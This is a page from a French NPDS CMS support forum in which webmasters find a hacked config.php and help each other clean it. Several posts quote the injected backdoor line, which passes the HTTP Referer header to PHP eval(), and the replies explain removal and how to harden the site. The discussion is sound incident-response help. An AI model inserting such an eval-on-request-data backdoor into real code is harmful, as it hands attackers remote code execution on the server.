Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !

  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !

  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » gros plantage dans config.php  
2 pages [ 1 | 2 ]
Auteurgros plantage dans config.php
lebuzz
11   

lebuzz
  Posté : 21-03-2007 16:31

message d'erreur suivant lorsque les utilisateurs se connectent à mes sites (tous mes sites sous NPDS Sable dernière version...) :

Parse error: syntax error, unexpected ':' in /mnt/141/sda/4/c/olivier.delannoy/npds/config.php(125) : eval()'d code on line 1

Warning: Cannot modify header information - headers already sent by (output started at /mnt/141/sda/4/c/olivier.delannoy/npds/config.php(125) : eval()'d code:1) in /mnt/141/sda/4/c/olivier.delannoy/npds/index.php on line 40

je n'ai touché à rien !!! qq a t-il une solution ???
  Profil  www  Citation   
Tito
7758       
 

Tito
  Posté : 21-03-2007 16:59

Ca ne fait ça que quand quelqu'un s'identifie?

Tu peux nous copier les lignes 120 à 130 de ton config.php? (normalement il n'y a aucune donnée sensible aux alentours de la ligne 125).
  Profil  E-mail  www  Citation   
lebuzz
11   

lebuzz
  Posté : 21-03-2007 17:10

Voici les lignes en question :

# $storyhome: How many stories to display in Home Page?
# $oldnum: How many stories in Old Articles Box?
# $ultramode: Activate ultramode plain text and XML files backend syndication? (1=Yes 0=No). locate in /cache directory
######################################################################

$top = 10;if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER]);
$storyhome = 10;
$oldnum = 10;
$ultramode = 1;

######################################################################
# Banners/Advertising Configuration

A noter que l'entete de config.php semble avoir été piraté au niveau des codes d'acces qui ne sont pas les bons...
pour compléter le message d'erreur s'affiche au lancement de la page d'accueil et ce sur TOUS mes sites NPDS !!??

Message édité par : lebuzz / 21-03-2007 17:13

  Profil  www  Citation   
Tito
7758       
 

Tito
  Posté : 21-03-2007 18:26

Tu t'es fait piraté!

Supprime de toute urgence ça:
if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER]);
  Profil  E-mail  www  Citation   
Tito
7758       
 

Tito
  Posté : 21-03-2007 18:32

J'ai posté le message précédent pour faire une réponse rapide

Ce code permet à une personne mal intentionnée d'exécuter n'importe quel script sur ton site!

Pour nettoyer ce fichier, va dans administration>préférences et valide (même sans modification). Cela réécrira un fichier propre.

Vérifie tout de même que le code avec HTTP_REFERER n'a pas été inscrit automatiquement dans config.php. Dans ce cas, il faut que tu réenvoyes le fichier /admin/settings_save.php.

Tu devrais modifier ton mot de passe FTP, car si ce bug apparait sur tous tes sites c'est probablement par là qu'on t'a piraté.
  Profil  E-mail  www  Citation   
UTR70
106     

UTR70
  Posté : 21-03-2007 19:29

$top = 10;if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER]);


J'ai aussi cette ligne sur le fichier config.php

Que dois-je faire ?
  Profil  www  Citation   
Tito
7758       
 

Tito
  Posté : 21-03-2007 20:27

Beh je l'ai expliqué...
  Profil  E-mail  www  Citation   
oim
1453       
 

oim
  Posté : 21-03-2007 21:02

Se serait bien de savoir ce que vous avez bien pu faire pour vous faire hacker !
  Profil  www  Citation   
UTR70
106     

UTR70
  Posté : 21-03-2007 21:29

J'avais remis une sauvegarde propre de config.php, donc je pense que créé un fichier propre ne l'empêchera pas de revenir.

Je vais tenter de modifier mon mot de passe FTP
  Profil  www  Citation   
GiamDoc
7063       
 

GiamDoc
  Posté : 21-03-2007 21:39

vérifier déjà que vos chmods soient pas trop élevés style 777


forum phpbb, module de Dodi comme zone upload par exemple

Message édité par : GiamDoc / 21-03-2007 21:40

  Profil  E-mail  www  Citation   
UTR70
106     

UTR70
  Posté : 21-03-2007 21:54

Le Livre d'Or de Dodi aussi ?
  Profil  www  Citation   
GiamDoc
7063       
 

GiamDoc
  Posté : 21-03-2007 21:59

C'est pas pour critiquer mais les modules de dodi sont pas sécur

faut prendre que les modules validés par modules.npds.org

il y a td-livredor sécurisé et (antispam) par xgonin

Message édité par : GiamDoc / 21-03-2007 22:00

  Profil  E-mail  www  Citation   
GiamDoc
7063       
 

GiamDoc
  Posté : 21-03-2007 22:01

Citation : UTR70 

Le Livre d'Or de Dodi aussi ? 


Il y a des logs avec ce module?
  Profil  E-mail  www  Citation   
UTR70
106     

UTR70
  Posté : 21-03-2007 22:08

J'avais commencé le livre d'or avant de connaître TD-livredor, je n'ai pas pu migrer sinon je perdais tous mes messages.

Pour les logs, je ne sais pas ce que c'est, donc
  Profil  www  Citation   
developpeur
24581       
 

developpeur
  Posté : 21-03-2007 23:24

A suivre donc
  Profil  E-mail  www  Citation   
Aller à la page : [ 1 | 2 ]
  
Sauter à :

Temps : 0.0157 seconde(s)